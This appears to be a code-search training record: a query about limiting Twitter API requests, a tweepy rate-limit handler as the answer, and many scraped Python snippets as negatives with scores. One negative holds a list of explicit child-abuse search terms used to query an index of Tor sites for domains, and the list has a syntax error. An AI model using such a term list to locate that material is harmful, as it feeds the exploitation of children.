self.debug)\n\t\t#xmlstream.addObserver('/presence', self.debug)\n\t\t#xmlstream.addObserver('twisted.words.xish.xmlstream.STREAM_ERROR_EVENT', self.debug)\n\t\tself.xmlstream = xmlstream\n\t\tself.joinRoom(xmlstream)", "def on_start(self):\n self.login()", "def on_start(self):\n self.login()", "def on_start(self):\n self.login()", "def on_start(self):\n self.login()", "def authenticate():\n auth = OAuthHandler(config.CONSUMER_API_KEY, config.CONSUMER_API_SECRET)\n auth.set_access_token(config.ACCESS_TOKEN, config.ACCESS_TOKEN_SECRET)\n\n return auth", "def authenticate():\n auth = OAuthHandler(config.CONSUMER_API_KEY, config.CONSUMER_API_SECRET)\n auth.set_access_token(config.ACCESS_TOKEN, config.ACCESS_TOKEN_SECRET)\n\n return auth", "def run(self):\n rate = rospy.Rate(30)\n #rospy.loginfo(\"[perspective_filter] Start running the ros node\")\n while not rospy.is_shutdown():\n try:\n self.compute_relations()\n if self.visibility_monitor:\n self.filter()\n #self.publish_perspectives()\n rate.sleep()\n except KeyboardInterrupt:\n break", "def filter(self, *, threaded=False, **params):\n if self.running:\n raise TweepyException(\"Stream is already connected\")\n\n method = \"GET\"\n endpoint = \"search\"\n\n params = self._process_params(\n params, endpoint_parameters=(\n \"backfill_minutes\", \"expansions\", \"media.fields\",\n \"place.fields\", \"poll.fields\", \"tweet.fields\", \"user.fields\"\n )\n )\n\n if threaded:\n return self._threaded_connect(method, endpoint, params=params)\n else:\n self._connect(method, endpoint, params=params)", "def test_topic_list_view_unauthenticated(self):\n response = self.client.get(self.url)\n self.assertEqual(response.status_code, 200)\n self.assertEqual(len(response.context[\"topics\"]), 3)", "def listSearches(self, authenticationToken):\r\n pass", "def __init__(self, twitter_consumer_key, twitter_consumer_secret,\n twitter_access_key, twitter_access_secret,\n search_terms, search_on='news',\n bitly_access_token='',\n news_api_key=''):\n\n # Access Keys and Secrets for Twitter API obtained at: https://developer.twitter.com/\n auth = tweepy.OAuthHandler(twitter_consumer_key, twitter_consumer_secret)\n auth.set_access_token(twitter_access_key, twitter_access_secret)\n\n # Store API object for access to Twitter REST API\n self.__api = tweepy.API(auth)\n\n # Term(s) to search news feeds or Twitter on\n self.search_terms = search_terms\n\n # Method TwitterBot will use to search on. Current options are 'news' or 'twitter'\n self.search_on = search_on\n\n # Access token for optional Bitly API: https://dev.bitly.com/\n self.__bitly_access_token = bitly_access_token\n\n # Access token for optional News API: https://newsapi.org/\n self.__news_api_key = news_api_key\n\n # Will store list of items scraped from news or Twitter\n self.list = []", "def initialize(self):\n self.login()", "def main():\n client = SlackClient(ACCESS_TOKEN)\n\n if not client.rtm_connect(with_team_state=False):\n print(\"could not connect to slack\")\n sys.exit(1)\n\n print(\"connected to network!\")\n\n bot_id = client.api_call(\"auth.test\")[\"user_id\"]\n\n for data in tagged_messages(client, bot_id):\n if any(x in data.get(\"text\") for x in [\"lunch\", \"eat\", \"hungry\"]):\n whats_for_lunch(client, data)\n continue", "def test_authenticated(self):\n self.browser.addHeader(\n \"Authorization\", \"Basic {}:{}\".format(\"reviewer\", TEST_USER_PASSWORD)\n )\n self.browser.open(\"http://nohost/plone/full_review_list\")\n self.assertTrue(\"Full review list:\" in self.browser.contents)", "def main():\n domain_list = []\n base_url = \"http://localhost:9200/latest-tor/_search?pretty&size=9000&_source=title,domain\"\n keywords_list = ['preteen', 'loli', 'lolita', 'jailbait', 'pthc', 'best cp',\n '\"child porn\"', '\"kid porn\"', '\"child sex\"', '\"cp video\"',\n '\"nude children\"', '\"cp porn\"', '\"free child porn\"', 'kinderporn',\n '\"child rape\"', '\"toddler porn\"', '\"kids videos\"', '\"cp videos\"',\n 'lolilust', '\"pedo porno\"', '\"pedo content\"', 'underage', '\"cp pack\"',\n 'loliporn', 'pedofamily', '\"cp database\"', '\"pedo webcams\"', 'lolitacity']\n '\"xxx child\"', '\"xxx underage\"', '\"young forbidden\"']\n search_terms = []\n for index, term in enumerate(keywords_list):\n search_terms.append(term)\n if len(search_terms) >= 10 or index + 1 == len(keywords_list):\n url = base_url + \"&q=(\" + \" OR \".join(search_terms).replace(\" \", \"%20\") + \")\"\n search(url, domain_list)\n search_terms = []", "async def connect(self):\n\t\tprint(\"DocumentChatConsumer: connect: \" + str(self.scope[\"user\"]))\n\t\t# let everyone connect. But limit read/write to authenticated users\n\t\tawait self.accept()\n\t\tself.document_id = None", "def enable_subscription():\n client = KConsumer(config=subscriber_config)\n counter = 0\n while 1:\n data = client.consume()\n if data:\n print(\"Received Data\", counter)\n class_label = inference_on_data(data.value)\n publish_response(class_label)", "def init(\n self,\n ) -> bool:\n success = True\n try:\n self._allowed_users = self._get_allowed_users(\n **self._config[\"allowed_users\"]\n )\n self._api_key = keyring.get_password(\n self._config[\"namespace\"], self._config[\"api\"]\n )\n # Create the Application and pass it your bot's token.\n self.application = Application.builder().token(self._api_key).build()\n # on different commands - answer in Telegram\n self.application.add_handler(\n CommandHandler(\n command=\"status\",\n callback=self._check_status,\n filters=filters.Chat(self._allowed_users),\n )\n )\n self.application.add_handler(\n CommandHandler(\n command=\"pump\",\n callback=self._toggle_pump,\n filters=filters.Chat(self._allowed_users),\n )\n )\n self.application.add_handler(\n CommandHandler(\n command=\"valve1\",\n callback=partial(self._toggle_valve, valve_number=1),\n filters=filters.Chat(self._allowed_users),\n )\n )\n self.application.add_handler(\n CommandHandler(\n command=\"valve2\",\n callback=partial(self._toggle_valve, valve_number=2),\n filters=filters.Chat(self._allowed_users),\n )\n )\n self.application.add_handler(\n CommandHandler(\n command=\"valve3\",\n callback=partial(self._toggle_valve, valve_number=3),\n filters=filters.Chat(self._allowed_users),\n )\n )\n self.application.add_handler(\n CommandHandler(\n command=\"holidays\",\n callback=self._toggle_holidays,\n filters=filters.Chat(self._allowed_users),\n )\n )\n # on non command i.e message - echo the message on Telegram\n self.application.add_handler(\n MessageHandler(filters.TEXT & ~filters.COMMAND, None)\n )\n # Step log runninng al 200ms\n context = CallbackContext(self.application)\n context.job_queue.run_repeating(callback=self.step_log, interval=0.2)\n # logging info\n print(f\"'{self._name}' - {self._pid} successfully initialized\")\n self.telegram_queue.put(\n f\"Process {self._pid} - '{self._name}' successfully initialized\"\n )\n # Run the bot until the user presses Ctrl-C\n self.application.run_polling(allowed_updates=Update.ALL_TYPES)\n except Exception as error:\n print(f\"Process {self._pid} - \" + repr(error))\n success = False\n return success", "def login(self) -> None:\n\n sObj = Splitwise(self.consumer_key, self.consumer_secret)\n self.url, self.login_secret = sObj.getAuthorizeURL()\n print(self.url)\n self.oauth_token = input('token: ')\n self.oauth_verifier = input('verifier: ')", "def __init__(self):\n self.auth()", "def authenticate(self, reader, username, password):\n self.authentication[reader] = (username, password)\n return {\n 'status': 0,\n 'return': True\n }", "def __init__(self):\n super().__init__()\n\n # Will only reply to every 3rd or so tweet, defined in settings\n self.received_tweet_count = 0\n\n # Twitter api init\n self.auth = tweepy.OAuthHandler(CONSUMER_KEY, CONSUMER_SECRET)\n self.auth.set_access_token(ACCESS_TOKEN, ACCESS_SECRET)\n self.twitter_api = tweepy.API(self.auth)\n\n print('Authenticated, creating stream...')\n\n self._init_stream()", "def main():\n\n run_manual_session()\n # run_automated_session()", "def authenticated(self):\n self.__logger.debug(\"Setting up Disco handlers...\")\n self.stream.set_iq_get_handler(\"query\",\"http://jabber.org/protocol/disco#items\",\n self.__disco_items)\n self.stream.set_iq_get_handler(\"query\",\"http://jabber.org/protocol/disco#info\",\n self.__disco_info)", "def runSearch():\n\tglobal processLanguageOn\n\tdataToFind=getDataFromWidget(podSearchEntry)\n\t#Search through the keys otherwise data changes\n\tdataSource=podListbox.data.keys()\n\t#Store the results of the search\n\tresults=[]\n\t#Search the data source\n\tfor item in dataSource:\n\t\tif searchDataSource(dataToFind,[item],capital=True,full=False):\n\t\t\tresults.append(item)\n\n\t#Add the results to screen\n\tpodListbox.delete(0,END)\n\tfor item in results:\n\t\tpodListbox.addExisting(item)\n\n\tif processLanguageOn:\n\t\tprocessSearchLanguage(podSearchEntry)", "def authenticate(self):\n self.login(closet.app.config['USERNAME'],\n closet.app.config['PASSWORD'])", "def _ATTopic_query(self, **kw):\n del kw['path'] # don't want to limit to context as w/ folders\n return self.context.queryCatalog(self.context.REQUEST, \n False, # no batch here\n None, # no b_size here\n False,\n **kw)", "def start(self):\n if not self.available:\n self.get_auth_token()\n\n if self.key_required and not self.no_prompt:\n email = self.login_handler.data[\"username\"]\n key = input(\"Enter code sent to {}: \".format(email))\n result = self.login_handler.send_auth_key(self, key)\n self.key_required = not result\n self.setup_post_verify()\n elif not self.key_required:\n self.setup_post_verify()", "def update(self, config):\n self.n_topics = config['n_topics'] \n self.n_passes = config['n_passes'] \n self.min_docfreq = config['min_docfreq'] \n self.max_docfreq = config['max_docfreq']\n self.ngrams = config['ngrams'] \n self.n_words = config['n_words'] \n self.topic_range = config['topic_range'] \n self.ext_stop_words = config['ext_stop_words']", "def login_bot(self):\n pass", "def login(self):\n #create a client class which will make http requests with google docs server.\n print 'Logging in as '+ self.user + '\\n'\n self.client = gdata.sites.client.SitesClient(source=self.source, site=self.site, domain=self.domain)\n self.client.ClientLogin(self.user, self.PASS, self.client.source)" ]
[ "0.6053095", "0.58813876", "0.5666131", "0.557826", "0.5459492", "0.53823984", "0.532111", "0.532111", "0.5253463", "0.5241494", "0.52394074", "0.5199479", "0.51915526", "0.5182518", "0.51710373", "0.5163896", "0.51167077", "0.5087796", "0.50840545", "0.5075657", "0.5069533", "0.5069279", "0.5048159", "0.504411", "0.50242054", "0.50174624", "0.50005287", "0.49922007", "0.49904615", "0.4990199", "0.49845254", "0.49801382", "0.49572533", "0.49530932", "0.4948023", "0.49271432", "0.49156907", "0.4912503", "0.4906094", "0.49044928", "0.49020666", "0.49001107", "0.48913008", "0.48850393", "0.48771977", "0.4865874", "0.48588222", "0.48519737", "0.48401418", "0.4836969", "0.48235768", "0.47965917", "0.47876218", "0.47838765", "0.47667524", "0.47658372", "0.47655767", "0.47591826", "0.47514576", "0.47491068", "0.47399595", "0.47374427", "0.47358355", "0.47345144", "0.47318813", "0.47284898", "0.47247916", "0.47236875", "0.47217277", "0.47196952", "0.4710057", "0.4710057", "0.4710057", "0.4710057", "0.47082332", "0.47082332", "0.4698401", "0.4694452", "0.46931282", "0.46898937", "0.46880698", "0.46876222", "0.46815878", "0.4680778", "0.46801785", "0.4665836", "0.46598333", "0.46569294", "0.46551347", "0.46508247", "0.46442166", "0.464196", "0.46410963", "0.4622255", "0.46194586", "0.46177563", "0.461728", "0.46143827", "0.46000415", "0.4598374", "0.4597229" ]
0.0
-1
Limit the request sent to twitter server
def limit_handled(cursor): # TODO: possibly need this function to limit request frequency while True: try: yield cursor.next() except tweepy.RateLimitError: time.sleep(60)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def streamTweets(words = [], authors = [], timeLimit=120, removeRetweets=False, **kwargs):\n if 'stream' not in globals():\n global stream\n if 'api' not in globals():\n startTwitterApi(getApiKeys(fileName=\"apiConf2.txt\"))\n listener = StdOutListener(removeRetweets=removeRetweets)\n auth = api.auth\n stream = tweepy.Stream(auth, listener, tweet_mode='extended')\n else:\n stream.listener.setRemoveRetweets(removeRetweets)\n stream.listener.resetTweets()\n\n words = mapToValid(words)\n authors = mapToValid(authors)\n if not words and not authors:\n words=[\"the\", \"i\", \"to\", \"a\", \"and\", \"'s\", \"is\", \"in\", \"it\", \"you\", \"of\", \"for\", \"on\", \"my\", \"that\", \"e\", \"with\", \"me\", \"do\", \"have\", \"ciao\", \"o\", \"u\", \"cool\", \"good\", \"nice\", \"#\", \"*\", \":\", \";\", \",\", \".\", \"?\", \"-\", \"%\", \"$\", \"€\", \"!\", \"(\", \")\", \"=\", \"'\"]\n\n #myQuery = ' OR '.join(kwargs[\"words\"])\n if authors:\n kwargs[\"follow\"]=[user.id_str for user in list(map(api.get_user,authors))]\n else:\n kwargs[\"track\"]=words\n #if removeRetweets:\n # myQuery += \" -filter:retweets\"\n\n #myQuery += ' from:'\n #myQuery += ' OR from:'.join(kwargs[\"authors\"])\n #print(myQuery)\n import signal\n # Register the signal function handler\n signal.signal(signal.SIGALRM, __streamHandler__)\n # Define a timeout for your function\n signal.alarm(timeLimit)\n try:\n __stream__(stream,**kwargs)\n except Exception:\n print(\"Streaming over after time period of\", timeLimit, \"seconds... Retrieved\", len(stream.listener.getTweets()), \"tweets.\")\n stream.disconnect()\n if authors and words:\n print(\"Filtering out tweets that don't contain the specified words...\")\n myTweets=[]\n for tweet in stream.listener.getTweets():\n if 'full_text' in tweet:\n tweet['text'] = tweet['full_text']\n del (tweet['full_text'])\n if any(containsWord(tweet['text'],word) for word in words):\n myTweets.append(tweet)\n print(\"Done. Retrieved\", len(myTweets), \"tweets written by the authors specified and containing (any of) the words specified.\")\n return myTweets\n return stream.listener.getTweets()", "def TweetHandler(self):\n self.response.out.write('<br/><br/>Tweeting<br/>')\n self.response.out.write('this info will be tweeted:<br/>')\n # oldest non-tweeted and prepared\n oldest_changeset = Changeset.all().order('created_at').filter('is_tweeted =', False).filter('is_prepared =', True).fetch(1)\n if not oldest_changeset:\n self.response.out.write('nothing to tweet')\n return\n else:\n c = oldest_changeset[0]\n \n config = get_config()\n\n # do not tweet from localhost\n if not 'localhost' in self.request.url:\n auth = tweepy.OAuthHandler(config[\"consumer_key\"], config[\"consumer_secret\"])\n auth_data = OAuthAccessToken.all().filter('specifier =', config[\"twitter_username\"]).fetch(1)[0]\n auth.set_access_token(auth_data.oauth_token, auth_data.oauth_token_secret)\n self.response.out.write('<br/>tweeting with oauth:<br/>')\n api = tweepy.API(auth)\n self.response.out.write(\"id: %d\" % c.id)\n self.response.out.write(\"user: %s\" % c.user)\n self.response.out.write(\"comment: %s\" % c.comment)\n self.response.out.write(\"tweet: %s\" % c.tweet)\n try:\n api.update_status(c.tweet)\n except tweepy.error.TweepError, e: \n self.response.out.write( 'failed: %s' % e.reason )\n if \"Status is a duplicate\" in e.reason:\n c.is_tweeted = True\n c.put()\n return\n else:\n self.response.out.write('<br/>localhost - nothing actually tweeted:')\n\n self.response.out.write('<br/>%s' % c.tweet)\n\n c.is_tweeted = True\n c.put()", "def filter_tweet(tweet):\n if not filter_tweet_core(tweet):\n return False\n if bannedusers.search(tweet['user']['screen_name']) or (\n 'retweeted_status' in tweet and bannedusers.search(tweet['retweeted_status']['user']['screen_name'])):\n return False\n if tweet['user']['screen_name'] == credentials['username']: # Do not match self tweets :-)\n return False\n return True", "def handler(event,context):\n send_tweet(random.choice(potential_tweets))", "def handler(event, context):\n send_tweet(random.choice(potential_tweets))", "def handler(event, context):\n send_tweet(random.choice(potential_tweets))", "def on_tweet(self, tweet):\n pass", "def accepted(eachtweet):\n import general_functions\n from authenticator import oauth\n try:\n ##\n tweet = '{}: {} #{}'.format(eachtweet[0], eachtweet[1], eachtweet[3].upper())\n r = oauth.request('statuses/update', {'status': tweet})\n\n replace(\"clients.csv\",\"ReadyForAck.csv\")\n replace2(\"ReadyForAck.csv\",\"clients.csv\")\n except:\n print('ietsgaatfout')", "def analyzeUserTwitter(request):\n\tsend_text(\"starting to analyze user twitter\", \"9258995573\")\n\tprint(\"analyzeUserTwitter received a request with some data! \" + request.data.handle)\n\tphone_num = request.data.phone_num\n\tphone_num = phone_num.replace(\" \", \"\").replace(\"-\", \"\") # strip any whitespace or hyphens\n\n\n\t# twitterhandle may need to have the @ stripped off\n\tif twitterHandle[0] == \"@\":\n\t\ttwitterhandle = twitterhandle[1:]\n\n\tif \"@\" in twitterhandle:\n\t\t# something's terribly wrong here :(\n\t\treturn -1\n\n\tuser_sentiment, network_sentiment = main(twitterhandle, analyze_friends = True)\n\tif user_sentiment < -0.1 and user_sentiment > -0.5: # threshold for very minorly negative sentiment\n\t\t# send a text to the user with a positive news article\n\t\tmsg = \"Despite what Twitter might make you think, there's also good news out there in the world! https://www.goodnewsnetwork.org/swinhoes-turtle-the-most-endangered-on-earth-found-in-vietnam/\"\n\t\tsend_text(msg, phone_num)\n\telif user_sentiment < -0.5:\n\t\t# send a meditation tips article\n\t\tmsg = \"Twitter got you down? Here's some tips on how to refocus your mind and stay positive :) https://www.mindful.org/how-to-meditate/\"\n\t\tsend_text(msg, phone_num)\n userfriends = load_friends(twitterHandle)\n message_friend(twitterHandle, userfriends)\n\n\n\treturn render(request, \"index.html\")", "def process(self, filter_words, count=1):\n user = self.__api.get_user(self.__username)\n\n # print user.screen_name\n # print user.followers_count\n if self.__appMode == 1 and self.__TimeLineMode == 1:\n self.get_timeline(filter_words)\n else:\n if self.__friendMode:\n print(\"Getting all Twitter Friends \\n\")\n for friend in user.friends():\n self.get_tweet(friend.screen_name, filter_words, count)\n else:\n for screen_name in self.__priorityCoin:\n self.get_tweet(screen_name, filter_words, count)\n print('Twitter Data Extraction done!!')", "def _upload_to_twitter(self):\n if self._twitter:\n strip_file = self.create_strip(resolution_ratio=0.5)\n f = open(strip_file)\n self._twitter.request('statuses/update_with_media', {'status': self._twitter_text}, {'media[]': f.read()})\n f.close()\n os.remove(strip_file)", "def getTweets(user,maxTweets=3000,count=0,tweetId=0,cacheKey=False,credentials=False):\n api = ratedTwitter(credentials=credentials)\n limit = api.get_user_timeline_limited()\n if limit:\n print '*** TWITTER RATE-LIMITED: statuses.user_timeline:'+user+':'+str(count)+' ***'\n raise getTweets.retry(countdown = limit)\n else:\n args = {'screen_name':user,'exclude_replies':False,'include_rts':True,'trim_user':False,'count':200}\n if tweetId:\n args['max_id'] = tweetId\n \n okay, result = api.get_user_timeline(**args)\n \n if okay:\n print '*** TWITTER USER_TIMELINE: '+user+':'+str(tweetId)+' ***'\n if result:\n newCount = count + len(result)\n if maxTweets:\n if newCount > maxTweets: # No need for the task to call itself again.\n pushTweets.delay(result,user,cacheKey=cacheKey) # Give pushTweets the cache-key to end the job.\n return\n else:\n pushTweets.delay(result,user)\n\n newTweetId = min([t['id'] for t in result]) - 1 \n # Not done yet, the task calls itself with an updated count and tweetId.\n getTweets.delay(user,maxTweets=maxTweets,count=newCount,tweetId=newTweetId,cacheKey=cacheKey,credentials=credentials)\n else:\n pushTweets.delay([],user,cacheKey=cacheKey) # Nothing more found, so tell pushTweets the job is done.\n else:\n if result == '404':\n setUserDefunct(user)\n cache.set('scrape_tweets','done')\n if result == 'limited':\n raise getTweets.retry(countdown = api.get_user_timeline_limited())", "def _get_tweets(self):\n auth = tweepy.OAuthHandler(CONSUMER_KEY, CONSUMER_SECRET)\n auth.set_access_token(ACCESS_TOKEN, ACCESS_SECRET)\n api = tweepy.API(auth)\n search = api.search(self.term, lang='en', count=100)\n\n print(f\"Getting tweets that mention '{self.term}', \"\n f\"this may take a while...\")\n\n save_tweet_text = [tweet._json['text'] for tweet in search]\n while len(save_tweet_text) < 1000:\n try:\n oldest = search[-1].id - 1\n search = api.search(self.term, lang='en', count=100, max_id=oldest)\n new_tweets = [tweet._json['text'] for tweet in search]\n save_tweet_text.extend(new_tweets)\n\n # Turn into a set to remove duplicated tweets, then back to list\n save_tweet_text = list(set(save_tweet_text))\n except IndexError:\n break\n\n print(f\"Done. {len(save_tweet_text)} Tweets received.\")\n return save_tweet_text", "def robust_request(twitter, resource, params, max_tries=5):\n for i in range(max_tries):\n request = twitter.request(resource, params)\n if request.status_code == 200:\n return request\n else:\n print('Got error %s \\nsleeping for 15 minutes.' % request.text)\n sys.stderr.flush()\n time.sleep(61 * 15)", "def robust_request(twitter, resource, params, max_tries=5):\n for i in range(max_tries):\n request = twitter.request(resource, params)\n if request.status_code == 200:\n return request\n else:\n print('Got error %s \\nsleeping for 15 minutes.' % request.text)\n sys.stderr.flush()\n time.sleep(61 * 15)", "def robust_request(twitter, resource, params, max_tries=5):\n for i in range(max_tries):\n request = twitter.request(resource, params)\n if request.status_code == 200:\n return request\n else:\n print('Got error %s \\nsleeping for 15 minutes.' % request.text)\n sys.stderr.flush()\n time.sleep(61 * 15)", "def robust_request(twitter, resource, params, max_tries=5):\n for i in range(max_tries):\n request = twitter.request(resource, params)\n if request.status_code == 200:\n return request\n else:\n print('Got error %s \\nsleeping for 15 minutes.' % request.text)\n sys.stderr.flush()\n time.sleep(61 * 15)", "def ping(self, times=10):\n logging.debug(\"checking for rate limit info\")\n url = \"https://api.twitter.com/1.1/application/rate_limit_status.json?resources=search\"\n response = self.client.get(url)\n result = response.json()\n\n # look for limits in the json or the http headers, which can\n # happen when we are rate limited from checking the rate limits :)\n\n if \"resources\" in result:\n self.reset = int(result[\"resources\"][\"search\"][\"/search/tweets\"][\"reset\"])\n self.remaining = int(result[\"resources\"][\"search\"][\"/search/tweets\"][\"remaining\"])\n elif 'x-rate-limit-reset' in response.headers:\n self.reset = int(response.headers[\"x-rate-limit-reset\"])\n self.remaining = int(response.headers[\"x-rate-limit-remaining\"])\n else:\n logging.error(\"missing x-rate-limit-reset in headers: %s\", response.headers)\n if times == 0:\n logging.error(\"ping isn't working :(\")\n raise Exception(\"unable to ping\")\n else:\n times -= 1\n time.sleep(1)\n logging.info(\"trying to ping again: %s\", times)\n return self.ping(times)\n\n logging.info(\"new rate limit remaining=%s and reset=%s\",\n self.remaining, self.reset)", "async def get_tweets(self, ctx, username: str, count: int):\n cnt = count\n if count > 25:\n cnt = 25\n\n if username is not None:\n if cnt < 1:\n await self.bot.say(\"I can't do that, silly! Please specify a \\\n number greater than or equal to 1\")\n return\n msg_list = []\n api = self.authenticate()\n try:\n for status in\\\n tw.Cursor(api.user_timeline, id=username).items(cnt):\n if not status.text.startswith(\"@\"):\n msg_list.append(status)\n except tw.TweepError as e:\n await self.bot.say(\"Whoops! Something went wrong here. \\\n The error code is \" + str(e))\n return\n if len(msg_list) > 0:\n await self.tweet_menu(ctx, msg_list, page=0, timeout=30)\n else:\n await self.bot.say(\"No tweets available to display!\")\n else:\n await self.bot.say(\"No username specified!\")\n return", "async def tweepy_on_status(self, tweet):\n self.processed_tweets += 1\n if self.skip_tweet(tweet):\n return\n\n chan_conf = dutils.get(self.conf.follows, id=tweet.author.id_str)\n try:\n embed = await self.prepare_embed(tweet)\n content = None\n except:\n embed = None\n content = 'Failed to prepare embed for ' + tweet.tweet_web_url # If the preparation failed before setting tweet.tweet_web_url imma kms\n log.error('Failed to prepare embed for ' + str(tweet._json))\n\n # Make sure we're ready to send messages\n await self.bot.wait_until_ready()\n\n for channel in chan_conf.discord_channels:\n discord_channel = self.bot.get_channel(channel.id)\n\n # Check if the channel still exists\n if discord_channel is None:\n log.error('Channel {} unavailable to display tweet {}.'.format(discord_channel.id, tweet.id_str))\n continue\n\n # Check for required permissions\n perms = discord_channel.permissions_for(discord_channel.server.me)\n if not perms.embed_links:\n log.warning('Improper permissions in channel {} to display tweet {}.'.format(discord_channel.id, tweet.id_str))\n try:\n warning = '\\N{WARNING SIGN} Missed tweet from {} : `Embed links` permission missing. \\N{WARNING SIGN}'.format(tweet.author.screen_name)\n await self.bot.send_message(discord_channel, warning)\n except discord.DiscordException as e:\n log.error('Could not send warning to channel {}.\\n{}'.format(discord_channel.id, e))\n continue\n\n # Send the embed to the appropriate channel\n log.debug('Scheduling Discord message on channel ({}) : {}'.format(channel.id, tweet.text))\n await self.bot.send_message(discord_channel, content=content, embed=embed)\n\n # Update stats and latest id when processing newer tweets\n if tweet.id > chan_conf.latest_received:\n channel.received_count += 1\n chan_conf.latest_received = tweet.id\n self.conf.save()", "def __init__(self):\r\n # keys and tokens from the Twitter Dev Console\r\n consumer_key = 'e1I0CSqgSOGxhH940cey1PR50'\r\n consumer_secret = 'APZE7kT2MgJsledQszLbNVcZZEhCUDX3NKAseXTjnsEcggUAkf'\r\n access_token = '876294238144786432-Q9PfwxPd4T7OdYO9hXiFyVDO38Q8jZV'\r\n access_token_secret = 'e0RhKgnLLyHnEOrWS92Tw0pKv5hWrN3chjp4Azm4NayOG'\r\n\r\n # clean tween regular expression\r\n self.pattern = re.compile('(@[A-Za-z0-9]+)|([^0-9A-Za-z \\t])|(\\w+://\\S+)')\r\n\r\n # attempt authentication\r\n try:\r\n # create OAuthHandler object\r\n self.auth = tweepy.OAuthHandler(consumer_key, consumer_secret)\r\n # set access token and secret\r\n self.auth.set_access_token(access_token, access_token_secret)\r\n # create tweepy API object to fetch tweets\r\n self.api = tweepy.API(self.auth)\r\n logging.info(self.api.rate_limit_status()['resources']['search'])\r\n except:\r\n logging.error(\"Error: Authentication Failed\")", "def tweet(self, string):\n if len(string)>140:\n print \"This string is too long, and it will be truncated to fit on Twitter.\"\n\n selt.api.update_status(string[:140])", "def post(self, request):\n if request.user.is_authenticated:\n if not request.user.consumer_key and not request.user.consumer_secret and not request.user.oauth_token and \\\n not request.user.oauth_token_secret:\n return Response({\"message\": \"Kindly supply the twitter authentication keys in the admin dashboard\"},\n status=status.HTTP_400_BAD_REQUEST)\n else:\n tweets = request.data.get('tweets', None)\n if tweets is not None:\n api = load_api(request)\n try:\n api.update_status(tweets)\n except tweepy.TweepError as e:\n return Response({\"message\": e.args[0][0]['message']}, status=status.HTTP_400_BAD_REQUEST)\n return Response({\"message\": \"Your tweets has been updated\"}, status=status.HTTP_201_CREATED)", "def get_tweets(api, username, fh, limit):\n if args.json is False:\n for status in tqdm(tweepy.Cursor(api.user_timeline, screen_name=username).items(limit), unit=\"tw\", total=limit):\n process_tweet(status)\n if args.save:\n fh.write(str(json.dumps(status._json))+\",\")\n else:\n for status in (tweepy.Cursor(api.user_timeline, screen_name=username).items(limit)):\n process_tweet(status)\n if args.save:\n fh.write(str(json.dumps(status._json))+\",\")", "def robust_request(twitter, resource, params, max_tries=5):\n \n for i in range(max_tries):\n request = twitter.request(resource, params)\n if request.status_code == 200:\n return request\n else:\n print('Got error %s \\nsleeping for 15 minutes.' % request.text)\n sys.stderr.flush()\n time.sleep(61 * 15)", "def get_friends(twitter,userid,count):\n url = 'https://api.twitter.com/1.1/friends/ids.json?&user_id='+str(userid)+'&skip_status=true&include_user_entities=false&count='+str(count) \n consumer = oauth.Consumer(key=consumer_key, secret=consumer_secret)\n access = oauth.Token(key=access_token, secret=access_token_secret)\n client = oauth.Client(consumer, access)\n li=[]\n try:\n response,data = client.request(url)\n dataStr = data.decode('utf-8') \n if('Rate limit exceeded' in dataStr ):\n print('rate limit exceeded error.. sleep for 15 min')\n time.sleep(61 * 15)\n response,data = client.request(url)\n \n jsonid = json.loads(dataStr)\n li = list(jsonid['ids'])\n \n except:\n pass\n \n return li", "def on_status(self, status):\n try:\n \n time = status.created_at\n text = str(status.text)\n \n if text.startswith('RT'):\n text = text.split('RT')[1].replace(',','')\n print(text)\n print(time)\n \n line = str(text + ',' + str(time) + '\\n')\n output = open('tweets.txt','a')\n output.write(line)\n output.close() \n else:\n text = text.split('RT')[0].replace(',','')\n print(text)\n \n line = str(text + ',' + str(time) + '\\n')\n output = open('tweets.txt','a')\n output.write(line)\n output.close()\n\n # count\n self.counter += 1\n print(self.counter)\n \n if self.counter < self.limit:\n return True\n else:\n self.counter ==0\n twitterStream.disconnect()\n \n \n except BaseException as e:\n print('failed on_status,',str(e))", "async def rate_limit(self, ctx):\n await ctx.send(\"We have found that the approximate rate limit is 30-40 requests per second. Staying \"\n \"below this should be safe.\")", "def test_api_requests_limited(self):\n\n did_reach_rate_limit = False\n for _ in range(110):\n response = self.send_get('Participant', expected_status=None)\n if response.status_code == TooManyRequests.code:\n did_reach_rate_limit = True\n break\n\n self.assertTrue(did_reach_rate_limit)", "def crawlAccount(target):\n\n\t# connect Twitter api\n\ttwitter = connectTwitter()\t\n\ttry:\n\t\tuser_timeline = twitter.get_user_timeline(screen_name=target, count=200, include_rts=False, exclude_replies=False)\n\texcept TwythonError:\n\t\tsys.exit('Received 404 for %s. Account does not exist or is banned.' % target)\n\t\n\tuser_timeline = twitter.get_user_timeline(screen_name=target, count=200, include_rts=True, exclude_replies=False)\t\n\ttweets = []\n\tids = []\n\n\n\t# stop this loop\n\twhile len(ids) < user[0]['statuses_count']:\n\t\tif len(user_timeline) == 0:\n\t\t\tprint '[!] No more tweets available. Ending scraper.\\n'\n\t\t\tbreak\n\n\t\tfor tweet in user_timeline:\n\t\t\tids.append(tweet['id'])\t\t\t\n\t\t\ttweets.append(tweet)\n\n\t\t\twith open('../Raw data/tweets/%s.json' % screen_name, 'a') as json_out:\n\t\t\t\tjson.dump(tweet, json_out)\n\t\t\t\tjson_out.write('\\n')\n\n\t\tprint '\\t[i] Found %i tweets so far.' % (len(ids))\n\t\t\n\t\ttime.sleep(5)\n\t\tuser_timeline = twitter.get_user_timeline(screen_name=screen_name, count=200, max_id=min(ids) - 1, include_rts=True, exclude_replies=False)\t\n\t\t\n\telse:\n\t\tprint '[!] All tweets scraped. Ending scraper.\\n'\n\t\treturn", "async def tweet_feeder(self): \n try:\n data=json.loads(self.request.body.decode('utf-8'))\n except: \n print(\"No data body!\")\n\n t=Tweet()\n t.tweet_id = data[\"tweet_id\"]\n t.text=data[\"text\"]\n #\n # update the hashtags cache\n #\n try:\n t.hashtags=data[\"hashtags\"] \n for htag in t.hashtags:\n #print(\"adding to hashtags: {} to cache:\".format(htag[\"text\"], ))\n if htag[\"text\"] in hash_cache:\n hash_cache[htag[\"text\"]] += 1\n else:\n hash_cache[htag[\"text\"]] = 1\n except:\n t.hashtags=[]\n \n #\n # update the user cache\n #\n try:\n user_id = \"@\" + data[\"user_screenname\"]\n if user_id in user_cache:\n user_cache[user_id] += 1\n else:\n user_cache[user_id] = 1\n except:\n print(\" ERR No User: should never happen\")\n\n try:\n t.user_screenname=data[\"user_screenname\"]\n except:\n t.user_screenname=\"\"\n try:\n t.profile_image_url_https = data[\"profile_image_url_https\"]\n except:\n t.profile_image_url_https = \"\"\n #\n # update the tweets cache\n #\n try:\n t.timestamp = 